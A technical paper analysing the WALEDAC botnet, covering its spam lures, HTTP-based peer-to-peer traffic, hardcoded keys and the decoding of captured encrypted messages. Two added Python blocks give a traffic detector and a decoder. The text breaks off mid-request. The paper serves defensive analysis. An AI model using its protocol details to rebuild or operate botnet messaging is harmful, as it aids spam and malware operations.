Infiltrating WALEDAC Botnet's Covert Operations

Effective Social Engineering, Encrypted HTTP2P Communications, and Fast-Fluxing Networks

A Technical Paper by: Jonell Baltazar, Joey Costoya, and Ryan Flores



TABLE OF CONTENTS

Introduction  1
Methodology  2
Social Engineering Techniques Seen  3
Network Traffic Characteristics  4
  HTTP-BASED P2P COMMUNICATIONS  5
    Technologies Involved  6
    WALEDAC Binaries  6
    Deciphering WALEDAC Message Encryption and Encoding  8
    Decrypting the Encrypted Registry Blob  17
  WALEDAC HTTP2P COMMUNICATION PROTOCOL  18
  WALEDAC COMMAND DISTRIBUTION  25
WALEDAC Botnet Profile  28
  SIZE OF THE BOTNET  28
  WALEDAC PROXIES AND FAST-FLUX NETWORKS  28
  SPAM AND DOMAIN INFORMATION  29
  ROGUE ANTIVIRUS  30
Conclusions  33
Appendix A  34
  WALEDAC SOCIAL ENGINEERING TACTICS  34
Appendix B  43
  SPAMMING ACTIVITY  43
Appendix C  52
  WALEDAC HTTP2P COMMUNICATION PROTOCOL  52
References  65
Picture Credits  65


INTRODUCTION

The WALEDAC botnet has been involved in an almost continuous spate of spam runs since researchers discovered it in December 2008. Its creators routinely take advantage of various real-world events and occasions, using them as social engineering ploys to trick users into performing certain actions. They leverage various sophisticated tools and technologies to create a formidable network of spam bots. The botnet can update details such as the subject line and the message body of the spam it sends, and it can even update versions and communication proxies. It is a vast umbrella of compromised computers whose owners are often unaware that their system resources are being misused for malicious distributed-computing activities; this lets the botnet keep expanding its reach and improve its ability to penetrate additional systems all over the world.

In the course of conducting research for this paper, we have seen WALEDAC’s secret ways and means. It employs a sophisticated communication method and encrypts network traffic using various known technologies. It operates through a moving, changing, and working network of nodes that perform preprogrammed tasks with surprising efficiency. We found the technical capability and scope of this botnet’s operations both too massive and advanced to leave unexamined.

While research on WALEDAC has already been conducted by sudosecure.net, the Honeynet Project, NNL-labs, and the University of Bonn Institute of Computer Science, this paper provides a comprehensive view of the WALEDAC botnet—its activities, methodology, involved technologies, purpose, and business model—in order to paint a picture of the complex and intricate nature of the threats that we see today. Spam is no longer a mere inbox annoyance but the first step toward executing more dangerous kinds of system infiltration. Malware is no longer a discrete executable but a motley group of related components and files that work together to surreptitiously get inside systems. The technologies malware crime fighters are using are—in some cases—being used against us. The people behind these cybercrimes are no longer fame-seeking script kiddies; they are now professional criminals who have created robust cybercrime businesses.


METHODOLOGY

To monitor WALEDAC's activities more closely, we built a malware laboratory that could capture all the spam generated by WALEDAC, along with the botnet's network traffic. This monitoring system comprised two virtual machines (VMs) that ran on VMware Workstation, namely:

» Infect VM: The VM where the WALEDAC bot executes.

» Firewall VM: The VM that controls Infect VM's outgoing traffic, traps the spam generated by WALEDAC, and prevents it from being sent over the Internet. Firewall VM also hosts a Post Office Protocol 3 (POP3) service so we can download and study the spam via an email client.

Packets were captured inside the host operating system (OS). Figure 1 illustrates how the two VMs' network connections were set up.

Figure 1. Network connection system used to monitor WALEDAC

We used Thunderbird as the email client to view the spam caught by Firewall VM, which likewise made it easier for us to monitor the messages generated.

Fortunately, WALEDAC does not contain VM-detection codes, making it easier to monitor the botnet without the use of additional hardware.


SOCIAL ENGINEERING TECHNIQUES SEEN

WALEDAC was using the Christmas 2008 holidays as its social engineering ploy when we first spotted it. Since then it has changed its social engineering tactic seven times, tying its spam to holidays and to current economic events. Appendix A chronicles the social engineering techniques we have seen this botnet use throughout its lifetime.

In addition to tricking users into running malware on their computers, WALEDAC also consistently populates inboxes with pharmaceutical (pharma) spam—spam advertising Viagra, Cialis, and similar sexual-enhancement drugs. There are times, however, when WALEDAC spews out spam that is neither pharmaceutical in nature nor carries other malware. This suggests that it may have been hired by third parties or clients as a spamming service. These regular WALEDAC spam runs are also documented in detail in Appendix B.

The timeline shown in Figure 2 summarizes the WALEDAC activities seen so far.

Figure 2. Timeline of WALEDAC activities


NETWORK TRAFFIC CHARACTERISTICS

After months of monitoring, we have verified that WALEDAC’s Hypertext Transfer Protocol (HTTP) network traffic has the following characteristics:

» Uses the word Mozilla when issuing a GET or a POST HTTP request as HTTP Referrer and User Agent at the same time

» Creates an HTTP POST request to a Uniform Resource Locator (URL) that points to a Portable Network Graphics (.PNG) image file

Figure 3. Typical HTTP POST request

» Uses a=<string> and &b=<string> in the majority of its HTTP requests

Figure 4. Message body contained in a=<string> and &b=<string>


» Uses an X-Request-Kind-Code HTTP request header whose value can either be a server or a node

Figure 5. Presence of an X-Request-Kind-Code HTTP header
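As an added example that is not part of the paper, the four traffic characteristics above can be turned into a small checker that scores raw HTTP requests. The three sample requests (and the 192.0.2.x hosts in them) are constructed for the demonstration, not captured traffic; the X-Request-Kind-Code value "nodes" and the a=/&b= body shape follow the captures quoted later in this paper.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample requests (not captured traffic): a getkey-style POST,
# a nodes request, and an ordinary browser request for contrast.
SAMPLE_REQUESTS: List[str] = [
    "POST /oumqnpocgw.png HTTP/1.1\r\n"
    "Referer: Mozilla\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla\r\n"
    "Host: 192.0.2.10\r\n"
    "\r\n"
    "a=_wAAArbl9G7IqhWZ_HDKu0aJe7jw&b=AAAAAA",
    "POST / HTTP/1.1\r\n"
    "Referrer: Mozilla\r\n"
    "X-Request-Kind-Code: nodes\r\n"
    "User-Agent: Mozilla\r\n"
    "Host: 192.0.2.11\r\n"
    "\r\n"
    "q69d-opDMIUGdOAkQLVWZJImCD",
    "GET /index.html HTTP/1.1\r\n"
    "Referer: https://www.example.com/\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Host: www.example.com\r\n"
    "\r\n",
]


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw request into (method, path, headers, body); header names
    are lower-cased so the comparison is case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError("malformed request line")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0].upper(), parts[1], headers, body


def waledac_traits(raw: str) -> Dict[str, bool]:
    """Score one request against the four traits listed above. 'Mozilla' must
    be the whole header value: a real browser's User-Agent starts with
    'Mozilla/5.0' and must not match. The captures in this paper spell the
    header both 'Referer' and 'Referrer', so both spellings are accepted."""
    method, path, headers, body = parse_request(raw)
    referer = headers.get("referer", headers.get("referrer", ""))
    return {
        "mozilla_referer_and_user_agent":
            referer == "Mozilla" and headers.get("user-agent") == "Mozilla",
        "post_to_png":
            method == "POST" and path.split("?", 1)[0].lower().endswith(".png"),
        "a_and_b_form_body":
            re.fullmatch(r"a=[A-Za-z0-9_-]+&b=[A-Za-z0-9_-]*", body) is not None,
        "x_request_kind_code": "x-request-kind-code" in headers,
    }


def trait_count(raw: str) -> int:
    return sum(waledac_traits(raw).values())


def flag_suspects(requests: List[str], threshold: int = 2) -> List[int]:
    """Indexes of requests showing at least `threshold` traits. One trait on
    its own is a weak signal; two or more together are a much stronger one."""
    return [i for i, r in enumerate(requests) if trait_count(r) >= threshold]
```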

HTTP-Based P2P Communications

WALEDAC takes a page out of Storm's book by implementing a sophisticated communication network. It encrypts its network traffic and utilizes a peer-to-peer (P2P) model, much like Storm did. Although Storm was known for using Overnet P2P communication[1], WALEDAC improved this tactic by using an HTTP-based P2P communication network coined as HTTP2P traffic[2] by security researchers.

WALEDAC HTTP2P uses a complex variation of known technologies, including Rivest-Shamir-Adleman (RSA) and Advanced Encryption Standard (AES) encryption using OpenSSL, an eXtensible Markup Language (XML)-based message structure, bzip2 compression, and Base64 encoding.

[1] The Overnet P2P network of Storm was described by Joe Stewart in his Blackhat presentation, "Inside the Storm: Protocols and Encryption of the Storm Botnet" (http://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf).

[2] The term HTTP2P was coined by Shadowserver in a blog entry (http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20081231).


TECHNOLOGIES INVOLVED

WALEDAC uses the following technologies to encrypt communications:

» TiXml: A library used to handle messages using the XML structure.

» OpenSSL version 0.9.8e: An open-source library used to encrypt messages sent from a WALEDAC server to other WALEDAC nodes and vice versa.

» AES: Used to encrypt messages sent to other WALEDAC nodes, along with WALEDAC data stored in an affected system’s registry. WALEDAC specifically uses 128-bit AES encryption.

» RSA: Encryption method other researchers claim WALEDAC is using to encrypt session keys between a server or a node and another node and vice versa (unconfirmed).

» bzip2: Used to compress messages sent to and from WALEDAC nodes, along with data stored in an affected system’s registry.

» Base64: Used to encode messages sent via HTTP (the characters + and / are replaced first before sending the message since they are reserved characters in HTTP).

WALEDAC BINARIES

Since December 2008, WALEDAC has been posting new binaries on its website at an estimated rate of twice a day. In mid-February, however, while the WALEDAC website was donning a Valentine’s theme, the botnet began pushing new binaries even more frequently.

We started monitoring WALEDAC binaries more closely at the beginning of March 2009. A total of 3,568 samples have been collected so far—1,741 in March and 1,827 in April (as of April 24). The highest daily count so far was 120. This was equivalent to one new sample every 12 minutes. The high frequency of sample updates rendered the blacklisting of WALEDAC samples (i.e., antivirus signatures) less effective in timely blocking all newly published samples.

Figure 6. Daily WALEDAC sample count


We downloaded one of said binaries for analysis. It has the following properties:

MD5: 2586518e10bc853bdcb95b5bf3ab3eb0
SHA1: 618268b1722fbf261f68bc77ee564437f658c115
File size: 441,345 bytes
File name: nocrisis.exe

Unpacking the WALEDAC binary reveals the following hardcoded data:

1. A self-signed certificate


We used the OpenSSL x509 utility to examine the certificate by issuing the following command:

$ openssl x509 -text -noout -in <path to file containing certificate>

It then displays the following, which reveals that the certificate contains an RSA 1024-bit public key and other information:

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: bb:c5:91:63:0b:ff:54:79
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=GB, ST=Berkshire, L=Newbury, O=My Company Ltd
        Validity:
            Not Before: Oct 21 20:11:48 2007 GMT
            Not After: Nov 20 20:11:48 2007 GMT
        Subject: C=GB, ST=Berkshire, L=Newbury, O=My Company Ltd


        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                    00:9f:74:fa:f0:bb:8a:c5:21:28:1f:28:03:33:01:ff:
                    09:84:ff:2a:48:08:b5:36:a3:59:eb:f2:05:65:48:90:bc:65:76:01:20:4d:4e:
                    03:38:80:49:86:9d:00:9b:4d:d0:0b:fa:29:6d:2c:bb:70:e1:f0:62:09:cb:bc:
                    c9:04:ff:a2:d3:de:30:e1:8c:b6:07:4a:63:b4:ba:fd:83:63:60:9d:6c:05:1a:
                    df:f4:1a:31:1a:81:e9:8c:6b:27:fa:00:35:2d:2a:21:37:a4:61:bd:26:b4:62:
                    28:2f:7d:4d:7d:f5:00:9b:23:61:23:37:aa:c2:f8:43:c9:53:21:32:c9
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier:
                2F:5D:F6:2B:10:75:38:E7:E9:49:EC:7D:8D:23:CE:7D:46:33:5E:10
            X509v3 Authority Key Identifier:
                keyid:2F:5D:F6:2B:10:75:38:E7:E9:49:EC:7D:8D:23:CE:7D:46:33:5E:10
                DirName:/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd
                serial:BB:C5:91:63:0B:FF:54:79
            X509v3 Basic Constraints:
                CA:TRUE
    Signature Algorithm: sha1WithRSAEncryption
        59:8a:61:16:6f:db:8b:91:cf:ee:19:8f:
        10:6b:7c:8f:42:5f:c5:cb:d6:f0:fd:56:b7:65:c2:a2:93:bc:1a:2c:12:39:49:d1:14:20:
        9a:9b:e3:c8:61:99:ee:4d:24:0c:1c:e7:d0:0a:3a:02:0f:62:21:fa:31:06:bb:e6:ce:a5:
        c1:c2:97:2f:c4:ad:de:ec:c0:7a:39:59:c1:a1:16:aa:72:ca:24:d0:b7:52:63:6d:b0:dd:
        29:1a:5b:ce:e6:35:a6:9d:4b:c5:fc:2c:a0:46:9d:52:2f:30:67:c1:ed:22:b8:39:b6:67:
        7a:27:52:01:91:78:7d:7b:8c:f4:ae:f9

2. Two 128-bit AES keys are hardcoded inside the WALEDAC binary. These keys are used to encrypt its HTTP2P traffic, along with data stored in the registry. The first key is found just before the self-signed certificate mentioned earlier while the second is found beside the first key.

Figure 7. The 128-bit AES keys and certificate found inside the WALEDAC binary


DECIPHERING WALEDAC MESSAGE ENCRYPTION AND ENCODING

The diagram below shows the general flow of the encryption and encoding of WALEDAC traffic. (Note that some encrypted messages do not follow this flow.)

Figure 8. General WALEDAC encryption and encoding routine

To decrypt and decode the original XML message, reverse the steps described above. The step-by-step decoding and decryption is shown in Figure 9.

Figure 9. General steps in WALEDAC message decoding and decryption

The following is a sample of an encrypted WALEDAC message. This particular transaction shows the first message sent by WALEDAC to another node. The first encrypted message is sent via HTTP POST to a WALEDAC node with the Internet Protocol (IP) address 12.135.152.45.


POST /oumqnpocgw.htm HTTP/1.1
Referer: Mozilla
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla
Host: 12.135.152.45
Content-Length: 957
Cache-Control: no-cache

a=_wAAArbl9G7IqhWZ_HDKu0aJe7jwCLHjGrH9DDxgcc7B3Xo4Fx7s6P2h8bqEq0Fqnx-ue2vjJ_nlnvV3YeJD8s9UPt9deldC538CHLPf1g_ZJFM9-zIe-3GaZWkCkUCwsr93p790F-y5jwZFw7HuA9k5oxiqmzhT08gifxv6PYafAZOrSYrHGJN7hgueRbsfFxAKi6JBQ6OY2iGgyE7A57j8RWXtL-ThOmZdSRdZfGAoWloENz9vUr5VPU-qNv7f2IFDkNdlmNukXz1_mGqV61QHY5iZpAhY7R1IgNh40bLSE3HLBrOFtHSHwo2Q3iw2uNC-Rp-C0Wm5iKQr7oqhy5bUKqbYdvFo9IFmL524ohc_Yp_VYYpmYzJ6ea2EhZzrht-L2qchP_L-sKqJhV3l5xCIUE_MA445oHEln_jvSqyCOQsYfYAREGN6shjacro9A4v0NM1zJId8a30if1ZbOTxm7wCNe8KVDJt_JJJ936bb4HDsXZ580Oz_xf_5mD0nw-OyohwrWoXX8-m3qT24-nOj2wzE5XBRrskgWzNQuJq84TdbVc_leMT7H-1WW-CywquAqMpHfMKju4fHGbqHNFcwgVU3AHvw1TN1B-MOxvxm3758EitkS91KrCOivsNADyAZPUGKkXKVaY61-o5w9swvRYMsDQC-5dJOh1z-BFp5jKqfmJwQCGB6m2m5T16cN21kE0lvobiIEyprItwIqjKufDqfGmIsVXsmfRDtHk-RAjiTe4NxjRSIfSrBXw5qhGMzvyE7r2tffCGyB4MkDMslNciKgizyjoW3UoSvUDlLN6F4s7SKk90c2nO3FCM9m_ShEHX6sS3rauA7hOYztFMy9UAipegY5rHfGaaEfCQK5sISXmny07LcP-6kXlRB50i7fAZZnQT_mT9kY-vW1NR93nxg_N53c_stcp9YNgOwBsFIOw&b=AAAAAA

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Thu, 19 Mar 2009 09:37:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.8

187
_wAAARJT21iVma3vUq76l5iKofYMtm6dKE6GNTwIkG8utXnNCgmzqrBh33nYaIYIskVk-OadaTe3mplnt3CXIkErs-TTeARXl-MBi6vvX-hI3QxNAna1dk9hsehqOz6Hxm8VH26Sw4FqCyMihjASc0AMOPhvzW0SE1Ly4RY2zbVtf9N6Xy3HzvJJe1EtW72uFGO9QhYEi-j_vwL8pXAZ1FlBvYYvNZFzD7SYYsb61r65Qds8pPGgRWuPLvvs4ljNgnlvh_lzsFlF2ObBDT5DhLLlPZiz_ZGpvFQsieUwA5R3vFyYgs78WIT26GE1FGbppi2PZYcAFX0bjM9Sq6lndqaAUhyggyg6bjdJUjhu2P5zQIAdSYEbGZXZs1ffEMH-e9QFyoI
0

POST /jint.htm HTTP/1.1
Referrer: Mozilla
Accept: */*
Content-Type: application/x-www-form-urlencoded

Follow the steps below to decode and decrypt the WALEDAC messages described earlier to get the original XML message from the first encrypted message sent.

1. Replace the characters - and _ found in the a=<string> with + and /, respectively, and replace the A characters in the &b=<string> with =. Note the difference between messages sent and received: a message sent comprises two parts, the string between a= and &b= and the string after &b=, whereas a message received has no a= and &b= parts. The following is a sample message sent to other WALEDAC nodes, with its a= and &b= parts shown.


a=_wAAArbl9G7IqhWZ_HDKu0aJe7jwCLHjGrH9DDxgcc7B3Xo4Fx7s6P2h8bqEq0Fqnx-ue2vjJ_nlnvV3YeJD8s9UPt9deldC538CHLPf1g_ZJFM9-zIe-3GaZWkCkUCwsr93p790F-y5jwZFw7HuA9k5oxiqmzhT08gifxv6PYafAZOrSYrHGJN7hgueRbsfFxAKi6JBQ6OY2iGgyE7A57j8RWXtL-ThOmZdSRdZfGAoWloENz9vUr5VPU-qNv7f2IFDkNdlmNukXz1_mGqV61QHY5iZpAhY7R1IgNh40bLSE3HLBrOFtHSHwo2Q3iw2uNC-Rp-C0Wm5iKQr7oqhy5bUKqbYdvFo9IFmL524ohc_Yp_VYYpmYzJ6ea2EhZzrht-L2qchP_L-sKqJhV3l5xCIUE_MA445oHEln_jvSqyCOQsYfYAREGN6shjacro9A4v0NM1zJId8a30if1ZbOTxm7wCNe8KVDJt_JJJ936bb4HDsXZ580Oz_xf_5mD0nw-OyohwrWoXX8-m3qT24-nOj2wzE5XBRrskgWzNQuJq84TdbVc_leMT7H-1WW-CywquAqMpHfMKju4fHGbqHNFcwgVU3AHvw1TN1B-MOxvxm3758EitkS91KrCOivsNADyAZPUGKkXKVaY61-o5w9swvRYMsDQC-5dJOh1z-BFp5jKqfmJwQCGB6m2m5T16cN21kE0lvobiIEyprItwIqjKufDqfGmIsVXsmfRDtHk-RAjiTe4NxjRSIfSrBXw5qhGMzvyE7r2tffCGyB4MkDMslNciKgizyjoW3UoSvUDlLN6F4s7SKk90c2nO3FCM9m_ShEHX6sS3rauA7hOYztFMy9UAipegY5rHfGaaEfCQK5sISXmny07LcP-6kXlRB50i7fAZZnQT_mT9kY-vW1NR93nxg_N53c_stcp9YNgOwBsFIOw&b=AAAAAA

3. Concatenate the strings found in the a=<string> and in the &b=<string> after Step 1. We now have a Base64-encoded message; the value found in the &b=<string> serves as Base64 padding.

/wAAArbl9G7IqhWZ/HDKu0aJe7jwCLHjGrH9DDxgcc7B3Xo4Fx7s6P2h8bqEq0Fqnx+ue2vjJ/nlnvV3YeJD8s9UPt9deldC538CHLPf1g/ZJFM9+zIe+3GaZWkCkUCwsr93p790F+y5jwZFw7HuA9k5oxiqmzhT08gifxv6PYafAZOrSYrHGJN7hgueRbsfFxAKi6JBQ6OY2iGgyE7A57j8RWXtL+ThOmZdSRdZfGAoWloENz9vUr5VPU+qNv7f2IFDkNdlmNukXz1/mGqV61QHY5iZpAhY7R1IgNh40bLSE3HLBrOFtHSHwo2Q3iw2uNC+Rp+C0Wm5iKQr7oqhy5bUKqbYdvFo9IFmL524ohc/Yp/VYYpmYzJ6ea2EhZzrht+L2qchP/L+sKqJhV3l5xCIUE/MA445oHEln/jvSqyCOQsYfYAREGN6shjacro9A4v0NM1zJId8a30if1ZbOTxm7wCNe8KVDJt/JJJ936bb4HDsXZ580Oz/xf/5mD0nw+OyohwrWoXX8+m3qT24+nOj2wzE5XBRrskgWzNQuJq84TdbVc/leMT7H+1WW+CywquAqMpHfMKju4fHGbqHNFcwgVU3AHvw1TN1B+MOxvxm3758EitkS91KrCOivsNADyAZPUGKkXKVaY61+o5w9swvRYMsDQC+5dJOh1z+BFp5jKqfmJwQCGB6m2m5T16cN21kE0lvobiIEyprItwIqjKufDqfGmIsVXsmfRDtHk+RAjiTe4NxjRSIfSrBXw5qhGMzvyE7r2tffCGyB4MkDMslNciKgizyjoW3UoSvUDlLN6F4s7SKk90c2nO3FCM9m/ShEHX6sS3rauA7hOYztFMy9UAipegY5rHfGaaEfCQK5sISXmny07LcP+6kXlRB50i7fAZZnQT/mT9kY+vW1NR93nxg/N53c/stcp9YNgOwBsFIOw======

4. Base64-decode the message. The first 5 bytes of the output serve as the message header: the first byte is the command type, in this case 0xff (i.e., getkey), and the next double word (DWORD) gives the final length of the data after decryption and decompression (the decrypted data is a compressed bzip2 archive). In this case, this is 0x2b6, which is equal to 694 bytes. The rest of the decoded message is AES encrypted. Note that some encrypted messages do not have 5-byte headers.


5. Decrypt the message using the AES key. The data to decrypt must not include the command type and DWORD values mentioned in Step 3. Since this is the first message sent, the AES key is the first key found in the binary. The output is bzip2-compressed data, which can be identified by its first 5 bytes, \x42\x5a\x68\x39\x31 = BZh91.


6. Uncompress the data using bzip2. The result is an XML message with a length of 694 bytes (as mentioned in Step 3). The XML node <t> shows the command, <v> shows the version, <i> shows the identity of the machine that sent the message, and so on. The certificate found inside the WALEDAC binary is likewise included in the XML message.


<lm>
  <t>getkey</t>
  <v>34</v>
  <i>ab0a762d122d31252c0ba614a6124d23</i>
  <r>0</r>
  <props>
    <p n="cert">
      -----BEGIN CERTIFICATE-----
      ...
      -----END CERTIFICATE-----
    </p>
  </props>
</lm>
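To make the decoding steps concrete, here is an added Python implementation of the pipeline that is not from the paper. It handles the a=/&b= wrapper, the 5-byte header, the bzip2 layer and the <lm> XML (including the node-list replies shown later), and leaves the AES stage to a caller-supplied function because the key lives in the binary and the paper does not state the block mode. The request and reply prefixes are the first 64 characters of the captures quoted above; the getkey plaintext is constructed with a placeholder certificate; reading the length DWORD as big-endian is this example's inference from the captured bytes ff 00 00 02 b6.

```python
import base64
import bz2
import struct
import xml.etree.ElementTree as ET
from typing import Callable, Dict, Optional

# First 64 characters of the captured getkey request (with its b= part) and
# of the node's reply, both quoted in this section: enough to decode the
# 5-byte header without reproducing the full strings.
CAPTURED_REQUEST = ("a=_wAAArbl9G7IqhWZ_HDKu0aJe7jwCLHjGrH9DDxgcc7B3Xo4Fx7s6P2h8bqEq0Fq"
                    "&b=AAAAAA")
CAPTURED_REPLY = "_wAAARJT21iVma3vUq76l5iKofYMtm6dKE6GNTwIkG8utXnNCgmzqrBh33nYaIYI"
# Constructed getkey plaintext in the page's <lm> layout, with the
# certificate body replaced by a placeholder.
SAMPLE_GETKEY_XML = ('<lm><t>getkey</t><v>34</v><i>ab0a762d122d31252c0ba614a6124d23</i>'
                     '<r>0</r><props><p n="cert">-----BEGIN CERTIFICATE-----\n'
                     'PLACEHOLDER\n-----END CERTIFICATE-----</p></props></lm>')
BZIP2_MAGIC = b"BZh91"   # \x42\x5a\x68\x39\x31, the check in Step 5
HEADER_LEN = 5           #  command byte + DWORD declared length


def decode_wire(text: str) -> bytes:
    """Steps 1 to 3 plus the Base64 decode. Requests arrive as 'a=<s>&b=<s>',
    replies as a bare string. '-' and '_' map back to '+' and '/'; each 'A'
    in b= stands for one '=', but the bot sends b=AAAAAA, more than Base64
    can take, so only the padding the length needs is appended."""
    a, b = text, ""
    if text.startswith("a="):
        if "&b=" not in text:
            raise ValueError("request body lacks the &b= part")
        a, b = text[2:].split("&b=", 1)
    std = a.replace("-", "+").replace("_", "/")
    needed = (-len(std)) % 4
    if needed == 3:
        raise ValueError("Base64 length cannot be 1 more than a multiple of 4")
    if b and b.count("A") < needed:
        raise ValueError("b= part supplies too little padding")
    return base64.b64decode(std + "=" * needed)


def parse_header(blob: bytes):
    """Step 4: byte 0 is the command type (0xff = getkey); bytes 1-4 give the
    plaintext length after AES decryption and bzip2 decompression. The capture
    decodes to ff 00 00 02 b6, so the DWORD is read big-endian (0x2b6 = 694).
    Returns (command, declared_length, AES ciphertext)."""
    if len(blob) < HEADER_LEN:
        raise ValueError("message shorter than the 5-byte header")
    return blob[0], struct.unpack(">I", blob[1:HEADER_LEN])[0], blob[HEADER_LEN:]


def parse_lm(xml_bytes: bytes) -> Dict[str, object]:
    """Step 6 and the node-list replies: collect <t>, <v>, <i>, <r>, the
    <props> entries (as prop:<name>) and any <node ip port time>id</node>."""
    root = ET.fromstring(xml_bytes)
    if root.tag != "lm":
        raise ValueError(f"unexpected root element <{root.tag}>")
    out: Dict[str, object] = {}
    for child in root:
        if child.tag == "props":
            for p in child.findall("p"):
                out["prop:" + p.get("n", "")] = (p.text or "").strip()
        elif child.tag == "nodes":
            out["nodes"] = [{"ip": n.get("ip"), "port": n.get("port"),
                             "time": n.get("time"), "id": (n.text or "").strip()}
                            for n in child.findall("node")]
        else:
            out[child.tag] = (child.text or "").strip()
    return out


def unwrap_plaintext(decrypted: bytes, declared_len: Optional[int],
                     compressed: bool = True) -> Dict[str, object]:
    """Steps 5 and 6 after AES: check the bzip2 magic, decompress, compare the
    length with the header (if any) and parse the XML. compressed=False is for
    the AES-only /index.php reply, which skips bzip2."""
    if compressed:
        if not decrypted.startswith(BZIP2_MAGIC):
            raise ValueError("AES output is not a bzip2 stream (wrong key?)")
        decrypted = bz2.decompress(decrypted)
    if declared_len is not None and len(decrypted) != declared_len:
        raise ValueError(f"header declares {declared_len} bytes, got {len(decrypted)}")
    return parse_lm(decrypted)


def compress_xml(xml_text: str) -> bytes:
    """Encoding direction of Figure 8 up to the AES step (used here to
    exercise unwrap_plaintext offline on the constructed plaintext)."""
    return bz2.compress(xml_text.encode())


def decode_message(text: str, aes_decrypt: Callable[[bytes], bytes],
                   has_header: bool = True, compressed: bool = True):
    """Whole pipeline for the variants in this section. aes_decrypt is supplied
    by the caller with a key taken from the binary (AES-128, mode not given)."""
    blob = decode_wire(text)
    declared_len = None
    if has_header:
        _cmd, declared_len, blob = parse_header(blob)
    if not blob or len(blob) % 16:   # the 957-byte capture leaves 704 = 44 blocks
        raise ValueError("ciphertext is not a whole number of AES blocks")
    return unwrap_plaintext(aes_decrypt(blob), declared_len, compressed)
```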

The first reply is interesting. The steps in decrypting the first message as shown earlier in Steps 1–5 should be done to decrypt it. Note that the message received does not have the a= and &b= parts as shown below.

_wAAARJT21iVma3vUq76l5iKofYMtm6dKE6GNTwIkG8utXnNCgmzqrBh33nYaIYIskVk-OadaTe3mplnt3CXIkErs-TTeARXl-MBi6vvX-hI3QxNAna1dk9hsehqOz6Hxm8VH26Sw4FqCyMihjASc0AMOPhvzW0SE1Ly4RY2zbVtf9N6Xy3HzvJJe1EtW72uFGO9QhYEi-j_vwL8pXAZ1FlBvYYvNZFzD7SYYsb61r65Qds8pPGgRWuPLvvs4ljNgnlvh_lzsFlF2ObBDT5DhLLlPZiz_ZGpvFQsieUwA5R3vFyYgs78WIT26GE1FGbppi2PZYcAFX0bjM9Sq6lndqaAUhyggyg6bjdJUjhu2P5zQIAdSYEbGZXZs1ffEMH-e9QFyoI

In this example, the decrypted XML message is:

<lm>
  <v>34</v>
  <t>getkey</t>
  <props>
    <p n="key">BarssaWhsnVRx7MhcPm3FxzhMyO3sr0DnyMk/n6vPVfjmMGY7lYkO6xoOQpu7BbIZeCzPQ4ATjh/FdGZBqUPVYHpxLDRG3j7C7LRju+y+gAmNF3dY8HGlCJSJVlitKDwKBvZ6jhBKchVU0rKjZ20SE9P+fg+dblQ5T3yiF/2zSg=</p>
  </props>
</lm>


The node reply contained a Base64-encoded message that contains the new AES key that will decrypt the next message-related transactions. The decoded Base64 message will be:

05aaecb1a5a1b27551c7b32170f9b7171ce13323b7b2bd039f2324fe7eaf3d57e398c198ee56243bac68390a6eec16c865e0b33d0e004e387f15d19906a50f5581e9c4b0d11b78fb0bb2d18eefb2fa0026345ddd63c1c6942252255962b4a0f0281bd9ea384129c855534aca8d9db4484f4ff9f83e75b950e53df2885ff6cd28

The message is encrypted using the RSA public key found in the certificate that is hardcoded in the WALEDAC binary, given that this is the very first transaction of such sort (a new certificate is used in subsequent transactions with other nodes). To get the new AES key in this example, a WALEDAC RSA private key[3] should be used to decrypt the message. The private key remained unknown at the time this report was written.

After obtaining the new AES key (from debugging the WALEDAC binary), researchers can now decrypt the next message transactions with other nodes. An example of the second request is shown below.

a=AQAAAIvy5Rd_nXh3Ic1SKyFh38KB3yMlXofSVsUcvklyMeLvltsqvYSy2ggcKjMD7KWzxfqFJlVdWr5dDXtRfUU5mweaea5UqRqD_A74Gyl81PLHUoOCsA7wVMhM78zEwDoKNcl68kkUTKRke2dKa8uhkP9mpPnbAKiFc3NYczEpR1ZZZmhyFX2ZYOgkcXca65zSZgU&b=AAAAAA

When decrypted using the new AES key, the following was obtained:

<lm>
  <t>first</t>
  <v>34</v>
  <i>ab0a762d122d31252c0ba614a6124d23</i>
  <r>0</r>
  <props>
    <p n="label">mirabella</p>
    <p n="winver">5.1.2600</p>
  </props>
</lm>

We also observed that the new AES key used by WALEDAC did not change even after several transactions. The new AES key could still decrypt new message transactions from updated copies of the WALEDAC bot. From our tests, the AES key could also decrypt messages from WALEDAC binary versions 32 and above. We are uncertain if this is true, however, with versions prior to WALEDAC version 32.

[3] Discussed by Greg Sinclair of NNL-labs (http://www.nnl-labs.com/cblog/index.php?/archives/7-WALEDACWALEDACs-Communcation-Protocol.html).


WALEDAC also makes other requests that do not have the 5-byte message header after Base64 decoding. Such requests also lack the a=<string> and &b=<string> parts, as the sample HTTP request below shows.

POST / HTTP/1.1
Referer: Mozilla
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Request-Kind-Code: nodes
User-Agent: Mozilla
Host: 24.21.164.180
Content-Length: 3904
Cache-Control: no-cache

